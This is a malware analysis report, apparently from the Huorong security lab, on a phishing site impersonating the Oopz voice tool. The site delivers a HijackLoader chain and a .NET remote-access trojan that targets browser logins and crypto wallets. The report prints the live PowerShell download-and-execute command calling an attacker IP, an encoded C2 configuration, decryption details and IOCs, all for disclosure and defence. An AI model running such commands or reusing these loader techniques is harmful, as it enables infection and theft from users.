"开黑"变"被黑" | 你下载的Oopz可能是别人的"遥控器"
-
作者:火绒安全
-
发布时间:2026-08-03
-
阅读量:1041
事件概述
近期,火绒安全实验室在日常监测中发现,黑产团伙通过高度仿冒开黑语音工具Oopz的钓鱼网站(oopz.live),针对国内游戏玩家群体发起钓鱼投毒攻击。经火绒安全工程师分析,该攻击依托游戏语音工具的用户信任进行伪装,欺骗性极强,对经常下载语音、加速器、辅助工具的玩家群体威胁较大。攻击者诱导用户在本机执行恶意指令,从远端下载恶意MSI安装包并以静默方式安装至用户目录,全程无安装窗口或报错提示,受害者难以察觉。木马植入后,释放多个组件,通过多阶段加载、隐藏执行,并借助带数字签名的合法程序作为掩护,最终在内存中启动远控木马,可被远程操控,并存在窃取浏览器登录态、游戏账号及加密货币钱包等敏感数据的风险。目前,火绒安全产品已经实现对该行为的拦截与查杀。

查杀图
流程图

流程图
整体攻击链采用白加黑技术 ,解密并解压tracker_ctrl.json和pipelinedesc69.xml文件,将其注入合法的PE文件执行 ,最终加载远程控制木马。
初始载荷:钓鱼网站
本次攻击中,攻击者通过伪装的Oopz网站页面实施攻击。

诱导用户直接执行恶意指令。

实际执行的命令为:
powershell -c "iex(irm '93.152.224.13/adzBD58r3gIyBIQe ' - UseBasicParsing)"
这条命令从 93.152.224.13/adzBD58r3gIyBIQe拉取恶意PowerShell脚本原地执行。从远端服务器下载一个恶意的MSI安装包,并无声无息地安装到用户目录中。整个过程中受害者不会看到任何安装窗口或报错提示。本次分析的样本以看似正常的.msi安装包形式存在,其CustomAction表未检测出异常。

释放出的文件列表如下:

其中libcrypto-1_1.dll为恶意dll,Smart-Encoder.exe伪装身份为「Microvirt Software Technology Co. Ltd.」的「MEmu Multiple Instances Manager」(逍遥模拟器),tracker_ctrl.json和pipelinedesc69.xml文件为经压缩和加密的恶意载荷数据文件。
第二阶段:注入链
安装.msi文件,系统启动Windows安装程序msiexec.exe,首先加载恶意libcrypto-1_1.dll,读取tracker_ctrl.json到内存。

从tracker_ctrl.json内存中的基址+偏移0x57AB的位置开始,四字节+0x1FCE9FBC还原出下阶段要注入的dl、配置信息以及要注入的内容。

然后加载系统中的tapisrv.dll(Windows系统中与TAPI相关的重要动态链接库文件),写入tapisrv.dll的.text节中,大小为0x16B0。

跳转到tapisrv.dll.text节偏移0xED0处入口执行下一阶段。
核心逻辑为通过PEB遍历与导出表哈希解析API;其载荷路径为:读取pipelinedesc69.xml文件→从????IDAT块中提取数据→XOR→LZNT1解压→按名称哈希定位代码块→ LoadLibrary加载目标模块→自入口点起覆写指定长度字节并转移执行。

将pipelinedesc69.xml文件完整读入内存,然后在该内存中搜索"????IDAT",命中后检查"IDAT"后4字节是否等于0x03F31DE8,根据IDAT前四字节获取块长度,拷贝到另一块内存,然后执行XOR解密,XOR密钥取自0x03F31DE8后4字节,数据长度取自XOR密钥后4字节。

使用RtlDecompressBuffer,压缩格式为COMPRESSION_FORMAT_LZNT1(值为2),将解密后的数据解压到新缓冲。

在解压的数据中有一个自定义表,表中存放着Hijackloader的各模块的配置信息,每个表项0x8A字节,结构为{ANSI名称字符串,相对偏移,块大小},分别对应图中红色、蓝色、黄色方框。

从内存中提取到HijackLoader携带的载荷,共37个模块。

部分模块的功能如下:

根据hash 0x00741CF5在上述解压的数据中匹配(匹配到ti模块),返回该项数据块的指针。

然后加载input.dll,将ti模块写入到input.dll的.text节中,跳转执行。

模块加载顺序为ti→SM→TinycallProxy→modWriteFile→SM→AVDATA_dir→rshell→ESAL→CUSTOMINJECT→CUSTOMINJECTPATH→TinycallProxy→modCreateProcessmodCreateProcess创建挂起进程SpeAnchor128.exe,修改上下文,使恢复进程后执行恶意逻辑,解密xxxx.tmp,并加载到内存,跳转执行第三阶段。其中SpeAnchor128.exe和xxxx.tmp被释放在Temp目录下,SpeAnchor128.exe为Ventis Media, Inc.签名的合法文件,xxxx.tmp为加密后的载荷文件。

本阶段的核心目的是:借用签名宿主进程执行恶意加载链 ,降低基于进程名/签名信任的检测效果。
第三阶段: RAT
本阶段运行在已被劫持的SpeAnchor128.exe进程中。从Temp读取并解密配置文件 ,对另一个.tmp执行LoadImage,跳转到映射映像内继续多层解密 ,还原并执行.NET加载器。
加载器解密内存中的Osnjm载荷。

Assembly.Load 后调用入口,进入RAT DLL主体。

C2配置yWIg在Cxvubmpomw的资源目录中。

解密后如下:

C2配置文件:
H4sIAAAAAAAACm3TNw7j2AEA0MUO4AEW2MXULrclMCLFIHKBLT75STF95txRzEEMEsV0Bp/GwBzAduFrGYZb169+f//537/+8hvB0t8J/PqdIOjvHPntHz++fPvnjy/f/vXjy1//9itSFJGGggDeRwU2hQeVYgPk1Pd+5xM1boON6HQ3T/ITGHzVzXXX3LkN54GNSwACDzniBrcYBrYNIajFxyAtRVgTsQcqacMPowUHatGBILqi1knvgD2QB04ElcPwlA2d8WFI4yaeooMAeweEL4JtU5w7vT+ifsxDcasqpUEAvwvufHeVBwltkQe2DwClCHAD/3UNjIoAbMHkHrRVIkN5RoJx4+rPW3H0oxDTpiMKcnKWUMomeyEXZun6ctKN/aNfRfPQA1yDDotZ0OJ252JpOFhD2l1i3Sv9JUlUqnvY6wEfGrtU9bqBdU+GCUlxermRMt3SjHWwLJbazC7XudxXY0yH0gOLboHkB2I0DZPqvemECcsLX2Ap/2hfhTi1WoRU20TlUFwGdVLyKaGblL/ISzh02oEY6ijMtlUS640RnfOaqRzqwAAcvbzSXq/BrYRyU9BZu4SO5N5WjiG8KIgW+UM2NWGxmRKaiuaeAqdfiGKNx4U8L0fSrdJrVyzdcLybBjSnpNxq+Ihl6AxkSYy3Igr29PPKKCZ7GxKmYrXpCdotctJsUYwJjjmvf17Pq3f013MnRK3dG4pbPGixp2rHKdG79yGGr+SYTnw0P5Vp+uLjer0dLiwn/WByGlS2qzspncsf1LS38tlLj13x80POTAUqeu0OKGso0Q+57YI+GS8nUvZQnaFlX35l2Xr5lkiePunyJQeYN5DDjunsGEDgjjnyljyUXAWr7EfgVsLCnLwpkMymdzM235IVOLfy2sueSptZtzVuR5cTVSl2ffARGyEDcjhxWE0kzKUrPkfW5oFRZRqmImltddc316VHqez3dQjOZp8pfbdhaVhyk0XdRF7dzM060KWWnYfmXK6SQzhzfCvgLoGkWNiPaisQ2IAfT2VDEOR8ZQSyTYlSZful5675R0v6hputebvBXKi5UHzaEf6/aw7uAVu+8MDfwCbyl/93E5gCqESgJ9blfGwu9GZJKnX18tyxFd7J6/pp08bUqHD0pRvE78dF1uRs9O7w8VbB/uQ09Shh2m28u2mt8zxpR2EWuDMfJuSdsNDaLE/ILiiLc2wdzXPeNKbhNzOs4m1uaDSxKl0N+SFyVNJxXiYd8Dq+GSkoHgl/zV3XZd7bwISDPvKab8b3NGlqJGpjBop6wCiZY7R557nbm8HDsfNq2S4Iw49RYmRQu9+XgxW0ow6y8Ag5+rhM8/bOeo2sypc5P+Q5Vt4OnaiMbMxZBDW56qMAoHbDVp5RLrMhscI4Xd4R6S1idl7Joe2t4LlNehrP/jUlm6jjrxIK/e7etNIGHIKrC3GqtWVnTJ6CLNhdCXtsjILTQyVgSUxGJlPV0lrmiAE1Z4UWrToVmuNQCneUP+N152LNwKHWOelHjzzV4BZrk2cjQiKXFIV6PvWHFlu9XmuzdtdVbi6U7b13140Vt+KewPWFFFH4rKWIzTzEwgJ7WddjjN2betTxqJwahqWs0dzeylHVyRKwpb8KBVW0jVpVYEwFpmazCb+kN/Kw+CU/qCfn8hv6+DauL+3RWO2lD+qDCgor4JF17sjtsGeHt5JoTu7H9zX5wihUf82EKqp4T+7yRK/eouTcK6xXTKMCPKOoHN7obyWMCI/yhio1XrO4oWFYKDMQg1dqRlI9YLqA31k2w3JdFbUp+/P3r7Ao00+//PET/xVYFgQeUP9inZ/hkf4H1Hb9+csGAAA=
依次进行Base64解码、 Deflate解压、 Protobuf反序列化。

Protobuf结构

在解密后的资源文件yWIg中还发现了浏览器数据以及钱包名字符串 ,带有很明显的信息窃取和钱包窃取意图。

总结
本次事件为一起以仿冒Oopz开黑语音软件的钓鱼网站为入口,通过伪装MSI安装包投递的恶意软件攻击活动。样本以正常软件安装包为外观进行伪装,在受害主机中通过多阶段加载、进程迁移、签名进程掩护、内存执行等多层规避手段,最终启动.NET远控木马(RAT),建立TLS加密C2通信通道,并支持远程内存加载插件。结合投递方式、加载框架与终端行为能力分析,可判定该样本为典型的远控类恶意软件加载链;通过样本字符串与配置信息进一步分析可知,该木马具备持久化驻留能力,且存在窃取浏览器登录态、加密货币钱包等敏感数据的明确意图。
火绒安全在此提醒广大用户:
认准官方渠道:仅通过您已知且日常使用的官方网站或官方应用商店下载软件,请勿轻信搜索结果第一条广告、陌生私聊或来路不明的“更新包”链接;
仔细核对网址:钓鱼网站常采用与正版服务相近的域名或后缀,即使页面仿真度极高也不可轻信;无法确认网址合法性时,请从浏览器收藏夹或官方公众号、客服公布的官方地址访问;
警惕“免安装/绿色版/破解版”软件:即便文件带有数字签名、图标与正版一致,也有可能是被滥用的伪装程序;
若已误下载安装:请立即停止使用该软件,断开非必要网络连接,向单位IT或安全人员报告,并可考虑修改游戏、邮箱、支付等重要账号的密码。
IOC
ea9952ba70f262b42ecc8cd9140ae559
ee4c0d05606ce8f096654942fc4160d4
dcb95795410a24244ac2aac80d4822c4
43a0d11fd11e1adb55647d01155d9ae4
www.oopz.live
C:\ProgramData\SyncKubernetes_std
C:\Users\[用户名]\AppData\Roaming\SyncKubernetes_std
C:\Users\[用户名]\AppData\Local\Temp\SpeAnchor128.exe
C:\Users\[用户名]\AppData\Roaming\SyncKubernetes_std\Crisp.exe
93[.]152[.]224[.]13/adzBD58r3gIyBIQe
185[.]102[.]115[.]93:56001
185[.]102[.]115[.]93:56002
185[.]102[.]115[.]93:56003